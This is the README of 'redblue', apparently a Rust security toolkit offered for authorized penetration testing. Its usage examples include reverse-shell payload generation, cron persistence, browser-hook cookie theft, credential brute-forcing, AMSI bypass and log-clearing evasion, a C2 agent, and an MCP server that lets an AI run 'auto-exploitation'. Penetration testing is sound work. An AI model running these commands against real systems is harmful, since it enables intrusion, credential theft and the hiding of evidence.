Skip to content

forattini-dev/redblue

BranchesTags

Repository files navigation

redblue

The Ultimate Security Arsenal in a Single Binary

Rust License: MIT CI GitHub release

90+ security commands. 40+ protocols from scratch. Zero dependencies. 100% Rust.

curl -fsSL https://raw.githubusercontent.com/forattini-dev/redblue/main/install.sh | bash

Documentation | Quick Start | Install

What is redblue?

redblue replaces your entire security toolkit with a single, self-contained binary.

No installation scripts. No dependency chains. No version conflicts. Just download and execute.

Need JavaScript integration? The optional redblue-cli npm package wraps the same rb binary, supports npx and npm exec, and exposes a programmatic SDK for Node.js consumers.

Every network protocol is implemented from scratch using only Rust's standard library. DNS, HTTP/1.1, HTTP/2, TLS 1.2, TLS 1.3, Kerberos, SSH, LDAP, SMB, and 30+ more -- all built from first principles with only libc as a dependency.

At a Glance

Metric Value
Lines of Rust 479,000+
CLI commands 90+
Protocols from scratch 40+
Secret detection patterns 180+
Crypto primitives 18+
Runtime dependencies 1 (libc)

Features

Category Capabilities
Network SYN/UDP/Stealth scanning, OS fingerprinting, service detection, traceroute, netcat, ping, health monitoring
DNS Record lookup, zone transfer, DNS server with hijacking, DNS-over-HTTPS, DNS fingerprinting
Recon Subdomain bruteforce/passive, WHOIS, RDAP, CT logs, Wayback, email/username OSINT, breach detection, IP intel, Google dorking
Web Fuzzing (dir/vhost/param), CMS fingerprinting, crawling, DOM parsing, CSS selectors, HAR recording, .git scanner
TLS Cipher enumeration, certificate audit, Heartbleed detection, OCSP check, CT log verification, JA3/JA3S fingerprinting
Auth Credential testing (Basic/Digest/Form/SSH/FTP/SMTP), brute-force with rate limiting and lockout detection
Exploit Privesc enumeration, lateral movement, persistence, reverse shells, browser exploitation, payload generation, CVE database
Binary ELF/PE parsing, checksec, ROP gadget finder, shellcode generation, format string analysis, packing detection
Password Hash cracking (dictionary/mask/hybrid), bcrypt, auto format detection, mutation rules
Evasion Sandbox/VM detection, string obfuscation, anti-debugging, memory encryption, AMSI bypass, process injection, track covering
Secrets 180+ patterns across cloud, DevOps, databases, AI/ML, payment, social media, private keys, generic tokens
Vuln Intel CVE search (NVD/OSV), CISA KEV, Exploit-DB, MITRE ATT&CK mapping, IOC extraction, TAXII 2.1 client
Proxy HTTP CONNECT, SOCKS5, transparent proxy, MITM TLS interception, interactive shell (k9s-style TUI)
Agent C2 server/client with encrypted transports (HTTP/DNS/WebSocket), forward secrecy ratcheting, multi-agent crew
Crypto File vault (AES-256-GCM), encoding/decoding, classical ciphers, CyberChef-style recipes, crypto analysis
Storage RedDB: B-tree + graph + vector engine with SQL/Gremlin/Cypher/SPARQL queries, ACID transactions, WAL
Memory Process memory scanner (Cheat Engine-style), value/pattern/AOB scanning, hex editor (Linux)
Playbooks Automated pentest workflows with MITRE ATT&CK mapping, APT emulation, variable substitution
Graph Attack path analysis, blast radius, lateral movement mapping, Mermaid diagram export
MCP Model Context Protocol server for Claude AI integration with 18 tool modules and intelligent orchestration
Code Static analysis, secrets scanning, dependency analysis, SARIF export
Cloud Subdomain takeover detection, S3 bucket scanning, cloud service enumeration
Scripting Built-in scripting engine for custom automation
Report Pentest report generation from loot, findings, and attack graphs

Quick Start

# Install (one command)
curl -fsSL https://raw.githubusercontent.com/forattini-dev/redblue/main/install.sh | bash

# Network reconnaissance
rb network ports scan 192.168.1.1 --preset common
rb network host discover 10.0.0.0/24
rb ping 8.8.8.8
rb nc 192.168.1.1 80

# DNS
rb dns record lookup example.com --type MX
rb dns-server start --hijack "*.evil.com=10.0.0.1"

# Subdomain enumeration
rb recon domain subdomains example.com --passive
rb recon domain subdomains example.com --resolve -o json
rb recon domain bruteforce example.com -w wordlists/subdomains.txt

# Web fuzzing & security
rb web fuzz http://example.com/FUZZ -w common.txt -fc 404
rb web asset security http://example.com
rb web asset crawl http://example.com --har crawl.har

# TLS audit
rb tls security audit example.com

# Vulnerability intelligence
rb intel vuln search nginx 1.18.0
rb intel vuln cve CVE-2021-44228
rb intel vuln kev --stats
rb intel mitre technique T1059

# Credential testing
rb auth test http://example.com/login -u users.txt -p pass.txt --type form

# Password cracking
rb password crack hashes.txt -w rockyou.txt --rules

# Secrets detection
rb code secrets scan . --git

# Exploitation (AUTHORIZED USE ONLY)
rb exploit privesc enumerate
rb exploit payload shell bash 10.0.0.1 4444

# Binary analysis
rb binary elf analyze /usr/bin/target
rb binary rop gadgets ./vulnerable_binary

# MITM proxy
rb proxy mitm --port 8080 --intercept

# Crypto vault
rb crypto vault encrypt secrets.txt
rb crypto recipe "base64_encode | hex_encode" "hello"

# Process memory (Linux)
rb memory scan --pid 1234 --value 42

# Playbooks
rb playbook run web-pentest --target example.com

# MCP server (for Claude AI)
rb mcp serve

JavaScript / npm Quick Start

# Run the wrapper without installing it globally
npx redblue-cli dns record lookup example.com --type MX
npm exec --package redblue-cli rb -- tls security audit github.com

# Install the wrapper in a project
npm install redblue-cli
npx rb network ports scan 192.168.1.1 --preset common

# Let the wrapper manage the release binary
npx redblue-cli --install --print-binary-path
npx redblue-cli --check-update
npx redblue-cli --upgrade --channel next
const { createClient } = require('redblue-cli');

(async () => {
  const rb = await createClient({
    autoDownload: true,
    targetDir: '.redblue/bin'
  });

  const records = await rb.dns.record.lookup({
    target: 'example.com',
    type: 'MX'
  });

  console.log(records);
})();

Protocols from Scratch

Every protocol is implemented from first principles -- no external crates, no wrappers.

Category Protocols
Web HTTP/1.1 (RFC 2616), HTTP/2 (RFC 7540) with HPACK/Huffman, HTTPS
Security TLS 1.2 (RFC 5246) with ECDHE + AES-GCM + X.509 verification, TLS 1.3 key schedule
Name Resolution DNS (RFC 1035), DoH (RFC 8484), WHOIS (RFC 3912), RDAP (RFC 7480)
Authentication Kerberos 5 (RFC 4120) with PKINIT + S4U, SSH (RFC 4253)
Directory LDAP (RFC 4511), SNMP (RFC 1157)
File Transfer FTP (RFC 959), SMB/CIFS
Mail SMTP (RFC 5321)
Remote Access Telnet (RFC 854)
Databases MySQL, PostgreSQL, MSSQL (TDS), MongoDB, Redis
Network TCP, UDP, ICMP (RFC 792), raw sockets, packet crafting
Encoding ASN.1/DER (RFC 2459), X.509 certificates, HAR 1.2, CSS selectors

Cryptography (Pure Rust)

Type Implementations
Hash SHA-256, SHA-384, SHA-512, SHA-1, MD5
Symmetric AES-128, AES-256-GCM, ChaCha20-Poly1305
Asymmetric RSA, ECDH, P-256 (NIST), X25519
Key Derivation PBKDF2, HKDF (RFC 5869), TLS PRF (1.0/1.1/1.2), TLS 1.3 key schedule
MAC HMAC-SHA256, HMAC-SHA384, HMAC-SHA1, HMAC-MD5
Utility CSPRNG (OS-backed), UUID, Base64, Hex, BigInt arithmetic

Exploitation Framework

AUTHORIZED USE ONLY -- pentesting, CTF, bug bounty, education, your own audits.

# Privilege escalation enumeration
rb exploit privesc enumerate
rb exploit privesc suggest

# Reverse shells (encrypted, ICMP, HTTP, DNS, WebSocket)
rb exploit payload shell bash 10.0.0.1 4444
rb exploit payload shell python 10.0.0.1 4444 --encrypted

# Lateral movement
rb exploit lateral ssh-keys --target 10.0.0.0/24
rb exploit lateral pass-the-hash --hash NTLM_HASH

# Post-exploitation
rb exploit post-exploit enumerate
rb exploit persistence cron --command "rb agent connect"

# Browser exploitation
rb exploit-browser serve --port 8080
rb exploit-browser exec --id ZOMBIE_ID --script "document.cookie"

# CVE database
rb intel vuln cve CVE-2021-44228

MITM Proxy & Interactive Shell

Full man-in-the-middle proxy with a k9s-style TUI for real-time traffic inspection.

# Start MITM proxy with TLS interception
rb proxy mitm --port 8080 --intercept

# SOCKS5 proxy
rb proxy socks5 --port 1080

# Transparent proxy (Linux, requires iptables)
rb proxy transparent --port 8080

# Interactive proxy shell
rb proxy shell --port 8080

Interactive shell features:

  • Real-time request/response streaming
  • Intercept and modify requests on-the-fly
  • History browsing, filtering, and replay
  • Security header stripping for testing
  • WebSocket upgrade support

C2 Agent Framework

AUTHORIZED USE ONLY

Lightweight C2 framework with encrypted communications and forward secrecy.

# Start C2 server
rb agent server --port 4444

# Connect agent to server
rb agent connect --server 10.0.0.1:4444

# Interactive agent shell
rb agent shell

Features:

  • Multiple transports: HTTP/HTTPS, DNS covert channel, WebSocket
  • Forward secrecy with key ratcheting
  • Multi-agent crew coordination
  • Custom encrypted protocol

Binary Analysis

# ELF analysis
rb binary elf analyze ./target_binary
rb binary elf checksec ./target_binary

# PE analysis
rb binary pe analyze ./target.exe

# ROP gadgets
rb binary rop gadgets ./vulnerable_binary

# Shellcode generation
rb binary shellcode generate --arch x86_64 --type reverse_shell

Evasion Suite

AUTHORIZED USE ONLY -- for testing defenses and security controls.

16 evasion techniques for testing security products:

# Sandbox/VM detection
rb evasion sandbox detect

# String obfuscation
rb evasion obfuscate --input payload.bin

# Anti-debugging
rb evasion antidebug check

# Memory encryption
rb evasion memory encrypt --pid 1234

# Track covering
rb evasion tracks clear --logs --history

Password Cracking

# Dictionary attack
rb password crack hashes.txt -w rockyou.txt

# Mask attack (hashcat-style)
rb password crack hashes.txt --mask "?u?l?l?l?d?d?d?d"

# Hybrid (dictionary + mask)
rb password crack hashes.txt -w words.txt --mask "?d?d?d"

# Auto-detect hash format
rb password crack auto hashes.txt

Supports: MD5, SHA-1, SHA-256, SHA-512, bcrypt, NTLM, and more.

Process Memory Scanner

Linux-only, Cheat Engine-style memory inspection:

# Scan for a value
rb memory scan --pid 1234 --value 100

# Pattern/AOB scan
rb memory scan --pid 1234 --pattern "48 8B ?? ?? 89"

# Hex editor
rb hex view /path/to/binary
rb hex edit /path/to/file --offset 0x100

Vulnerability Intelligence

Aggregates data from multiple authoritative sources:

Source Description
NVD NIST National Vulnerability Database -- CVE details, CVSS scores, CPE matches
OSV Open Source Vulnerabilities -- Package-specific vulns (npm, PyPI, Cargo)
CISA KEV Known Exploited Vulnerabilities -- Actively exploited CVEs with deadlines
Exploit-DB Public exploits, PoCs, Metasploit modules
MITRE ATT&CK Tactics, techniques, and procedures mapping 
rb intel vuln search nginx 1.18.0
rb intel vuln cve CVE-2021-44228
rb intel vuln kev --stats
rb intel vuln exploit "Apache Struts"
rb intel mitre technique T1059
rb intel ioc extract report.txt
rb intel taxii discover https://taxii.example.com

Risk Score

Risk = (CVSS x 10) + Exploit Bonus (+25) + KEV Bonus (+30) + Age Factor + Impact Modifier

Pentest Playbooks

Automated security assessment workflows with MITRE ATT&CK mapping:

# List available playbooks
rb playbook list

# Run a web pentest playbook
rb playbook run web-pentest --target example.com

# Run APT emulation
rb playbook run apt29 --target 10.0.0.0/24

# Dry run
rb playbook run network-audit --target 10.0.0.1 --dry-run

Playbooks support variable substitution, conditional execution, and action recording.

MCP Server (Claude AI Integration)

redblue includes a full Model Context Protocol server enabling Claude to use all security tools:

# Start MCP server
rb mcp serve

18 tool modules: network, DNS, web, recon, TLS, crypto, binary, code, password, evasion, vulnerability, intelligence, file, wordlist, vector search, and auto-exploitation.

10 prompt generators: API security, attack planning, cloud security, compliance, container security, defense, mobile security, network security, recon guidance, threat modeling.

Crypto Toolkit

Beyond the vault, redblue includes a full crypto toolkit:

# File encryption vault (AES-256-GCM)
rb crypto vault encrypt secrets.txt
rb crypto vault decrypt secrets.vault

# Encoding/decoding
rb crypto codec base64 encode "hello world"
rb crypto codec hex decode "48656c6c6f"

# CyberChef-style recipes
rb crypto recipe "base64_encode | rot13 | hex_encode" "secret"

# Crypto analysis
rb crypto analysis entropy suspicious_file.bin

# Classical ciphers
rb crypto cipher caesar "hello" --shift 13
rb crypto cipher vigenere "hello" --key "secret"

RedDB: Unified Storage Engine

Multi-modal storage engine unifying relational tables, property graphs, and vector embeddings.

Architecture

┌─────────────────────────────────────────────────────────────┐
│                      Query Layer                            │
│  SQL | Gremlin | Cypher | SPARQL | Natural Language        │
├─────────────────────────────────────────────────────────────┤
│  Security Queries  |  Multi-Mode Executor  |  RAG Engine   │
├─────────────────────────────────────────────────────────────┤
│  Result Cache  |  Materialized Views  |  Query Plan Cache  │
├─────────────────────────────────────────────────────────────┤
│              SIEVE Page Cache + Aggregation Cache           │
├─────────────────────────────────────────────────────────────┤
│  Tables (B-Tree)  |  Graphs (Adjacency)  |  Vectors (HNSW) │
├─────────────────────────────────────────────────────────────┤
│              Page-Based Storage (4KB) + WAL + Encryption    │
└─────────────────────────────────────────────────────────────┘

Features

Feature Description
Storage modes B-Tree tables, adjacency graph, HNSW vectors
Query languages SQL, Gremlin, Cypher, SPARQL, natural language
Transactions ACID with MVCC snapshot isolation
Durability Write-ahead logging
Encryption At-rest encryption with keyring
Caching SIEVE page cache, result cache, plan cache, aggregation cache
Vector search HNSW + tiered quantization (binary + int8)
Graph algorithms PageRank, betweenness centrality, Dijkstra, Louvain, cycle detection
Import JSONL streaming, Parquet columnar
SIMD Runtime-detected SSE/AVX/FMA for vector distance (26M+ ops/sec)

Cross-Modal Queries

-- Find hosts with critical CVEs reachable in 3 hops
SELECT h.hostname, c.cve_id, v.similarity_score
FROM hosts h
JOIN vulnerabilities v ON h.id = v.host_id
WHERE h.criticality > 8
  AND VECTOR_SIMILARITY(e.embedding, $query) > 0.85
  AND EXISTS (
    SELECT 1 FROM attack_paths p WHERE p.target = h.id AND p.hops <= 3
  )

CLI Architecture

rb [domain] [resource] [verb] [target] [flags]
rb help
rb [domain] help
rb [target]              # Magic scan -- auto-detect
rb shell [target]        # Interactive TUI

Domains

Domain Description Example
network Port scanning, host discovery, traceroute rb network ports scan 10.0.0.1
dns DNS queries, server, hijacking rb dns record lookup example.com
recon Subdomain enum, WHOIS, OSINT rb recon domain subdomains example.com
web Fuzzing, crawling, scraping, security rb web fuzz http://target/FUZZ
tls TLS audit, cipher analysis rb tls audit security example.com
auth Credential testing rb auth test http://target --type basic
exploit Privesc, lateral, persistence, payloads rb exploit privesc enumerate
binary ELF/PE analysis, ROP, shellcode rb binary elf checksec ./target
password Hash cracking rb password crack hashes.txt -w dict.txt
evasion Anti-analysis, obfuscation rb evasion sandbox detect
intel Vuln search, MITRE, IOC, TAXII rb intel vuln search nginx
proxy MITM, SOCKS5, transparent rb proxy mitm --port 8080
agent C2 server/client rb agent server --port 4444
crypto Vault, codecs, ciphers, recipes rb crypto vault encrypt file.txt
code Secrets scanning, analysis rb code secrets scan .
cloud Takeover detection, S3 scanning rb cloud takeover example.com
memory Process memory scanning rb memory scan --pid 1234
playbook Automated pentest workflows rb playbook run web-pentest
database RedDB operations rb database query "SELECT * FROM hosts"
mcp MCP server for Claude AI rb mcp serve
report Pentest report generation rb report generate --format pdf
loot Findings and credential management rb loot list
hex Hex editor rb hex view binary_file
nc Netcat rb nc 10.0.0.1 80
ping ICMP ping rb ping 8.8.8.8

Global Flags

-h, --help        # Context-aware help
--version         # Show version
-o, --output      # Format: text|json
--no-color        # Disable colors

Installation

Quick Install

# Latest stable release
curl -fsSL https://raw.githubusercontent.com/forattini-dev/redblue/main/install.sh | bash

# Pre-release (next channel)
curl -fsSL https://raw.githubusercontent.com/forattini-dev/redblue/main/install.sh | bash -s -- --channel next

# Specific version
curl -fsSL https://raw.githubusercontent.com/forattini-dev/redblue/main/install.sh | bash -s -- --version v0.1.0

# Custom directory
curl -fsSL https://raw.githubusercontent.com/forattini-dev/redblue/main/install.sh | bash -s -- --install-dir /usr/local/bin

# Static build (Alpine/Docker)
curl -fsSL https://raw.githubusercontent.com/forattini-dev/redblue/main/install.sh | bash -s -- --static

Supported Platforms:

  • Linux x86_64, aarch64 (ARM64), armv7
  • macOS x86_64 (Intel), aarch64 (Apple Silicon)
  • Windows x86_64

JavaScript / npm

The npm package is a wrapper and SDK. It does not bundle the release binary inside the package.

# Add the wrapper to your project
npm install redblue-cli

# Run the CLI through the package name
npx redblue-cli dns record lookup example.com --type MX

# Run the rb bin exposed by the package without installing it globally
npm exec --package redblue-cli rb -- network ports scan 192.168.1.1 --preset common

# After local install, the package also exposes rb
npx rb dns record lookup example.com --type A
const { createClient } = require('redblue-cli');

(async () => {
  const rb = await createClient({
    binaryPath: '/custom/path/rb'
  });

  const audit = await rb.tls.security.audit({
    target: 'github.com',
    ports: '443'
  });

  console.log(audit);
})();

If you want the wrapper to manage the binary for you, use --install, --check-update, or --upgrade. Managed installs default to ~/.local/bin, and the wrapper still detects legacy installs in ~/.redblue/bin. For SDK consumers, autoDownload: true still works and can be combined with a custom targetDir.

Note: the exact command npx rb works after redblue-cli is installed in the project or globally. For zero-install usage, prefer npx redblue-cli ... or npm exec --package redblue-cli rb -- .... Use bare rb --version to query the real binary version; use wrapper --version <tag> or --release-version <tag> before the command when you want to pin a release download.

Build from Source

git clone https://github.com/forattini-dev/redblue
cd redblue && cargo build --release

Project Structure

src/
  cli/commands/     # 90+ CLI command implementations
  protocols/        # 40+ protocols from scratch (DNS, HTTP, TLS, Kerberos, SSH, ...)
  crypto/           # Pure Rust crypto (AES, ChaCha20, RSA, X25519, P-256, SHA, ...)
  storage/          # RedDB: B-tree + graph + vector engine with SQL/Gremlin/Cypher
  modules/
    network/        # Port scanning, host discovery, traceroute, netcat
    dns/            # DNS operations + DNS server with hijacking
    recon/          # 24+ reconnaissance modules (subdomains, OSINT, breach, ...)
    web/            # Fuzzing, CMS fingerprinting, crawling, DOM parsing
    tls/            # TLS audit, Heartbleed, OCSP, cipher analysis
    exploit/        # Privesc, lateral movement, persistence, payloads, browser exploit
    binary/         # ELF/PE parsing, checksec, ROP gadgets, shellcode
    password/       # Hash cracking (dictionary, mask, hybrid, bcrypt)
    evasion/        # 16 anti-analysis techniques
    proxy/          # MITM, SOCKS5, transparent proxy, interactive shell
    collection/     # Browser credentials, screenshots
    code/secrets/   # 180+ secret detection patterns
    graph/          # Attack path analysis (ShadowGraph)
    memory/         # Process memory scanner + hex editor
    cloud/          # Subdomain takeover, S3 scanning
    auth/           # Multi-protocol credential testing
    monitor/        # Port/service health monitoring
    scripting/      # Built-in scripting engine
    report/         # Pentest report generation
    ctf/            # CTF challenge generation
  agent/            # C2 framework with encrypted transports
  mcp/              # MCP server (18 tool modules, 10 prompt generators)
  playbooks/        # Automated pentest workflows
  intelligence/     # Assessment engine
  ui/               # Terminal graphics (braille canvas, charts)

Security & Ethics

AUTHORIZED USE ONLY

redblue is designed for:

  • Authorized penetration testing
  • CTF competitions
  • Bug bounty programs (with scope approval)
  • Your own security audits
  • Education and research

Always obtain written authorization before testing systems you don't own.

Documentation

Full documentation available at:

forattini-dev.github.io/redblue

cd docs && npx docsify-cli serve

Documentation | GitHub | Releases

Made with Rust by security engineers, for security engineers

About

The Ultimate Security Arsenal in a Single Binary

forattini-dev.github.io/redblue/

Resources

Readme
Activity
Custom properties

Stars

1 star

Watchers

0 watching

Forks

1 fork
Report repository

Releases

13 tags

Sponsor this project

Packages

 
 
 

Contributors

Languages